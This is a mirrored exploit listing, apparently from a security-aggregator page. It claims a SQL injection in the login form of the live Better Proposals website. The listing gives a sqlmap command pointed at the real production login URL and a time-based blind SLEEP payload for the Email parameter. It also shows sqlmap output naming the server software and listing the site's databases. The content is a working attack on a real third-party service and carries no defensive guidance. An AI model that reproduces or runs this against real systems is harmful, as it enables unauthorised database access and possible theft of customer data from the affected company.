Better Proposals: Online Proposal Software | SQL Injection

Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.io

Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070161

Below is a copy:

Better Proposals: Online Proposal Software | SQL Injection

# Exploit Title:Better Proposals: Online Proposal Software | SQL Injection Vulnerability
# Author:  
# Tested On: Kali Linux
# sqlmap -u "https://betterproposals.io/2/login/" --form --dbs --batch
---------------------------------------------------------------------------------------------------

.io British Territories in the Indian Ocean

Better Proposals: Online Proposal Software

Online Proposal Software - Better Proposals

https://betterproposals.io/2/login/

---
Parameter: Email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: Email=rLlf' AND (SELECT 5491 FROM (SELECT(SLEEP(5)))kKlT) AND 'hbrR'='hbrR&Password=&login=Sign In&RememberMe=1
---

the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.6.40
the back-end DBMS: MySQL >= 5.0.12

available databases [8]:
[+] better_blog
[+] information_schema
[+] innodb
[+] mysql
[+] performance_schema
[+] rpawsuebaq
[+] sys
[+] tmp

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.